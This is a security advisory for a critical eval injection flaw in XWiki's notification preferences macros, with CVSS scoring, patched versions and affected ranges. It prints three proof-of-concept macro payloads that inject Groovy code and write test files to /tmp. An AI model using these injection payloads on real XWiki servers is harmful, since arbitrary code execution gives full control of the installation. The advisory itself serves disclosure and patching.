GHSA-p9mj-v5mf-m82x

Suggest an improvement
Source
https://github.com/advisories/GHSA-p9mj-v5mf-m82x
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p9mj-v5mf-m82x/GHSA-p9mj-v5mf-m82x.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-p9mj-v5mf-m82x
Aliases
Published
2023-04-12T20:35:13Z
Modified
2026-09-10T03:50:01Z
Severity
  • 9.9 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H CVSS Calculator
Summary
org.xwiki.platform:xwiki-platform-notifications-ui Eval Injection vulnerability
Details

Impact

Any user with view rights on commonly accessible documents including the notification preferences macros can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the user parameter of the macro that provide the notification filters. These macros are used in the user profiles and thus installed by default in XWiki.

A proof of concept exploit is

{{notificationsFiltersPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit.txt~").withWriter { out -> out.println(~"created from filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}

{{notificationsAutoWatchPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit2.txt~").withWriter { out -> out.println(~"created from auto watch preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}

{{notificationsEmailPreferences target="user" user="~" /~}~} {{async async=~"true~" cached=~"false~" context=~"doc.reference~"~}~}{{groovy~}~}new File(~"/tmp/exploit3.txt~").withWriter { out -> out.println(~"created from email filter preferences!~"); }{{/groovy~}~}{{/async~}~}"/}}

If this creates files inside /tmp, the installation is vulnerable.

Patches

The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10.

Workarounds

The issue can be fixed by patching the code in the affected macros that are contained in XWiki documents as shown in the patch for this issue.

References

For more information

If you have any questions or comments about this advisory:

Database specific
{
    "cwe_ids":  [
        "CWE-94",
        "CWE-95"
    ],
    "github_reviewed":  true,
    "github_reviewed_at":  "2023-04-12T20:35:13Z",
    "nvd_published_at":  "2023-04-15T17:15:00Z",
    "severity":  "CRITICAL"
}
References

Affected packages

Maven
org.xwiki.platform:xwiki-platform-notifications-ui

Package

Name
org.xwiki.platform:xwiki-platform-notifications-ui
View open source insights on deps.dev
Purl
pkg:maven/org.xwiki.platform/xwiki-platform-notifications-ui

Affected ranges

Type
ECOSYSTEM
Events
Introduced
13.2-rc-1
Fixed
13.10.11

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p9mj-v5mf-m82x/GHSA-p9mj-v5mf-m82x.json"
org.xwiki.platform:xwiki-platform-notifications-ui

Package

Name
org.xwiki.platform:xwiki-platform-notifications-ui
View open source insights on deps.dev
Purl
pkg:maven/org.xwiki.platform/xwiki-platform-notifications-ui

Affected ranges

Type
ECOSYSTEM
Events
Introduced
14.0-rc-1
Fixed
14.4.7

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p9mj-v5mf-m82x/GHSA-p9mj-v5mf-m82x.json"
org.xwiki.platform:xwiki-platform-notifications-ui

Package

Name
org.xwiki.platform:xwiki-platform-notifications-ui
View open source insights on deps.dev
Purl
pkg:maven/org.xwiki.platform/xwiki-platform-notifications-ui

Affected ranges

Type
ECOSYSTEM
Events
Introduced
14.5
Fixed
14.10

Database specific

source
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/04/GHSA-p9mj-v5mf-m82x/GHSA-p9mj-v5mf-m82x.json"